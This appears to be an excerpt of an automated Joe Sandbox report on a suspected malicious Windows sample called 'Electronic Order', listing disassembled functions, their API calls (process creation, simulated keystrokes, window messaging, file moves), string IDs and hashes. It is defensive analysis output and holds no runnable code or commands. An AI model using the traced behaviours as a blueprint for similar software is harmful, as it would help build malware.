                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E2B7B1
                                      • GetLastError.KERNEL32 ref: 00E2B7BB
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00E2B828
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 6957f81aee824f54f89e72d6f715b602217310c28b050da0b08380a38a359739
                                      • Instruction ID: ad68ff98bafcc7609803cf0bb2e93b9c1f9bf6d80a02efe57b37e637a687d862
                                      • Opcode Fuzzy Hash: 6957f81aee824f54f89e72d6f715b602217310c28b050da0b08380a38a359739
                                      • Instruction Fuzzy Hash: 9C31A135A002159FDB04EF64E889EAEB7B4EF84704F14912AF405F7292DB719942CB61
                                      Function 00E19471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E194F6
                                      • GetDlgCtrlID.USER32 ref: 00E19501
                                      • GetParent.USER32 ref: 00E1951D
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E19520
                                      • GetDlgCtrlID.USER32(?), ref: 00E19529
                                      • GetParent.USER32(?), ref: 00E19545
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E19548
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: cb1dc12f4be5760c5e5b9a684e8f6abcbf65e2e646471b41d895cf82bf480712
                                      • Instruction ID: 14d672b526d08734a2fdfab2b3cf9ae3b98e0f29d8dd5b1f969b1a15eb8ca266
                                      • Opcode Fuzzy Hash: cb1dc12f4be5760c5e5b9a684e8f6abcbf65e2e646471b41d895cf82bf480712
                                      • Instruction Fuzzy Hash: 0421E074E00204AFDF00ABA1CCD5EFEBBA5EF49300F104169F922A72A2DB7559599B70
                                      Function 00E1955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E195DF
                                      • GetDlgCtrlID.USER32 ref: 00E195EA
                                      • GetParent.USER32 ref: 00E19606
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E19609
                                      • GetDlgCtrlID.USER32(?), ref: 00E19612
                                      • GetParent.USER32(?), ref: 00E1962E
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E19631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 9ac0fe2ef5721266583f7851432afb00cddab2dbd963bf2d5f59b4d6c959428c
                                      • Instruction ID: 0e4dd3ef8be1031fef74e6143653dcaf93d5fcf162683bcc1b49970198612823
                                      • Opcode Fuzzy Hash: 9ac0fe2ef5721266583f7851432afb00cddab2dbd963bf2d5f59b4d6c959428c
                                      • Instruction Fuzzy Hash: 5921CF74E00204BFDF00ABA1CC95EFEBBA8EF49300F114059F921A72A2DB7599599B70
                                      Function 00E19645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 00E19651
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E19666
                                      • _wcscmp.LIBCMT ref: 00E19678
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E196F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: dc3bdd0a29a35da4da8e434dfd91127b8354fc97f165eaa10c27418676e48d21
                                      • Instruction ID: 6e6a5e0e12d952c2d81e95483f7129b0087c9b3d54724e08b99a12d0a6818d09
                                      • Opcode Fuzzy Hash: dc3bdd0a29a35da4da8e434dfd91127b8354fc97f165eaa10c27418676e48d21
                                      • Instruction Fuzzy Hash: E7113A36248313BAFA063621DC2ADE6779CDF01764B201026F904B60D3FE5169814678
                                      Function 00E24189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 00E2419D
                                      • __swprintf.LIBCMT ref: 00E241AA
                                        • Part of subcall function 00DE38D8: __woutput_l.LIBCMT ref: 00DE3931
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E241D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 00E241E0
                                      • LockResource.KERNEL32(00000000), ref: 00E241ED
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00E2420D
                                      • LoadResource.KERNEL32(?,00000000), ref: 00E2421F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00E2422E
                                      • LockResource.KERNEL32(?), ref: 00E2423A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E2429B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: d5e1b6eb5d0349f3f0af5982ce39930888d8ebb912a0c85377a8c560b30a1d3f
                                      • Instruction ID: f3ab323f4370f484c8cf76a1a0ebdc659822ed8edee22f36a5315471b720d723
                                      • Opcode Fuzzy Hash: d5e1b6eb5d0349f3f0af5982ce39930888d8ebb912a0c85377a8c560b30a1d3f
                                      • Instruction Fuzzy Hash: B43182B650522AAFDB119FA2EC48EBF7BACEF05705F004525F905F21A0D770DA618BB4
                                      Function 00DCFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DCFC06
                                      • OleUninitialize.OLE32(?,00000000), ref: 00DCFCA5
                                      • UnregisterHotKey.USER32(?), ref: 00DCFDFC
                                      • DestroyWindow.USER32(?), ref: 00E04A00
                                      • FreeLibrary.KERNEL32(?), ref: 00E04A65
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E04A92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 884aa6eca17a34b69246ea5e981b65816a94a978f390aa5fc5d36f0d7e4cf673
                                      • Instruction ID: 3eb6c353c55ee127bdfbc7dfd042099f5b050ee6b2f9f72ae351898b7ef21398
                                      • Opcode Fuzzy Hash: 884aa6eca17a34b69246ea5e981b65816a94a978f390aa5fc5d36f0d7e4cf673
                                      • Instruction Fuzzy Hash: CAA16AB07012128FCB29EF55C594F69F7A5EF04700F1452ADE90AAB2A2DB30ED56CF64
                                      Function 00E39428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-218231672
                                      • Opcode ID: 72230b9b50dc436e5db87e2abdb5c20c38a944564d6f5f81b19ac2578019065c
                                      • Instruction ID: 5df22b40517a769f89f56fada94fdc6c2b0ae1dafee8ded9aba59e35759d3b4b
                                      • Opcode Fuzzy Hash: 72230b9b50dc436e5db87e2abdb5c20c38a944564d6f5f81b19ac2578019065c
                                      • Instruction Fuzzy Hash: 3791E071A00215AFDF24DFA5C889FAEBBB8EF85314F109059F515BB282D7B09945CFA0
                                      Function 00E1A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumChildWindows.USER32(?,00E1AA64), ref: 00E1A9A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 17421a25e25b5598a8991215ae0ff5d86f281f9c7d959fe9a3ea7e2fef7b4219
                                      • Instruction ID: f1a2ad53aac47006d5770cc25213f79cbf30f4f062adb95a8d65d0738fe7afab
                                      • Opcode Fuzzy Hash: 17421a25e25b5598a8991215ae0ff5d86f281f9c7d959fe9a3ea7e2fef7b4219
                                      • Instruction Fuzzy Hash: BB919230601646AADB08EF60D482BF9FB75FF44314F189129D89AB7151DB306AD9CBB1
                                      Function 00DC2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00DC2EAE
                                        • Part of subcall function 00DC1DB3: GetClientRect.USER32(?,?), ref: 00DC1DDC
                                        • Part of subcall function 00DC1DB3: GetWindowRect.USER32(?,?), ref: 00DC1E1D
                                        • Part of subcall function 00DC1DB3: ScreenToClient.USER32(?,?), ref: 00DC1E45
                                      • GetDC.USER32 ref: 00DFCF82
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DFCF95
                                      • SelectObject.GDI32(00000000,00000000), ref: 00DFCFA3
                                      • SelectObject.GDI32(00000000,00000000), ref: 00DFCFB8
                                      • ReleaseDC.USER32(?,00000000), ref: 00DFCFC0
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DFD04B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 657682f02a3eb1ba4d6475602ed43afdb26c96a7d76fe4bbf84d84fd5cbbf2bd
                                      • Instruction ID: 2f41ef2c707642ea15c47fbf0a99a68e07225a7df56b6a8f1292115bd009d6e0
                                      • Opcode Fuzzy Hash: 657682f02a3eb1ba4d6475602ed43afdb26c96a7d76fe4bbf84d84fd5cbbf2bd
                                      • Instruction Fuzzy Hash: C271A230500209DFCF259F64C984ABA7BB6FF49350F19826AFE55AB1A6C7318852DB70
                                      Function 00E38F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E4F910), ref: 00E3903D
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E4F910), ref: 00E39071
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E391EB
                                      • SysFreeString.OLEAUT32(?), ref: 00E39215
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 196d7643b90c93a4d93e75960297c5cdb2a3eab8a890852a51a0556235296e85
                                      • Instruction ID: 0cf7f682ea590fbe3f2d53333c54b6de8999ac7b80f0730d8a876523926512b0
                                      • Opcode Fuzzy Hash: 196d7643b90c93a4d93e75960297c5cdb2a3eab8a890852a51a0556235296e85
                                      • Instruction Fuzzy Hash: 41F11A75A00209EFDB04DF94C888EAEBBB9FF89314F108059F515BB251DB71AE45CB60
                                      Function 00E3F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E3F9C9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FB5C
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FB80
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FBC0
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FBE2
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E3FD5E
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E3FD90
                                      • CloseHandle.KERNEL32(?), ref: 00E3FDBF
                                      • CloseHandle.KERNEL32(?), ref: 00E3FE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: c6e7815602cf2dac3d00dcb1e1cc2acf392a1dfc2817bf82f95a4a1af57c4b63
                                      • Instruction ID: a932ef4352a9afe7deb3921c38ee12b03965daa3668b5d3b58c1bb0c1b6e0784
                                      • Opcode Fuzzy Hash: c6e7815602cf2dac3d00dcb1e1cc2acf392a1dfc2817bf82f95a4a1af57c4b63
                                      • Instruction Fuzzy Hash: 74E1C331604341DFCB14EF25C899B6ABBE1EF84714F14956DF899AB2A2CB30DC45CB62
                                      Function 00E24F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E238D3,?), ref: 00E248C7
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E238D3,?), ref: 00E248E0
                                        • Part of subcall function 00E24CD3: GetFileAttributesW.KERNEL32(?,00E23947), ref: 00E24CD4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E24FE2
                                      • _wcscmp.LIBCMT ref: 00E24FFC
                                      • MoveFileW.KERNEL32(?,?), ref: 00E25017
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: 68e27d5898586662696ef97253e6e604dd4e1c9bb2ee23b72e7d63569e9d874f
                                      • Instruction ID: ccd90a91452f2a824399dd3f628fdf0650bf67ea6c340071239e0442947c2e56
                                      • Opcode Fuzzy Hash: 68e27d5898586662696ef97253e6e604dd4e1c9bb2ee23b72e7d63569e9d874f
                                      • Instruction Fuzzy Hash: D25143B20087959BD724EB60DC819DFB3ECEF85341F00592EF185E3191EE74A6888B76
                                      Function 00E488B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E4896E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 629babccd5cbc53cbf9fcc1c0a05815e4a986a124071c0eb8f471a5f008a2635
                                      • Instruction ID: c949a33e1531fe21ba58ad1c66a66dc20327e7f3f2cd403a47bf6435ec7d68cd
                                      • Opcode Fuzzy Hash: 629babccd5cbc53cbf9fcc1c0a05815e4a986a124071c0eb8f471a5f008a2635
                                      • Instruction Fuzzy Hash: F651E530500204BFDF349F25EE85BAD7BA5FB05354F606116F614F65A0CFB1A980DB91
                                      Function 00DC2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DFC547
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DFC569
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DFC581
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DFC59F
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DFC5C0
                                      • DestroyIcon.USER32(00000000), ref: 00DFC5CF
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DFC5EC
                                      • DestroyIcon.USER32(?), ref: 00DFC5FB
                                        • Part of subcall function 00E4A71E: DeleteObject.GDI32(00000000), ref: 00E4A757
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 33845584564ec560bf309182f46193a1f60c313558ed3147709971df7d61a307
                                      • Instruction ID: 5db5a018e1836ff62533ef81c97d335698f04dd4119bfecaef92586dc0ac9f44
                                      • Opcode Fuzzy Hash: 33845584564ec560bf309182f46193a1f60c313558ed3147709971df7d61a307
                                      • Instruction Fuzzy Hash: B1519874A1020AAFDB24DF25DC45FBA3BB5EB48720F14452CF946A72A0DB70ED90DB60
                                      Function 00E19B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E1AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1AE77
                                        • Part of subcall function 00E1AE57: GetCurrentThreadId.KERNEL32 ref: 00E1AE7E
                                        • Part of subcall function 00E1AE57: AttachThreadInput.USER32(00000000,?,00E19B65,?,00000001), ref: 00E1AE85
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19B70
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E19B8D
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E19B90
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19B99
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E19BB7
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E19BBA
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19BC3
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E19BDA
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E19BDD
                                      Memory Dump Source
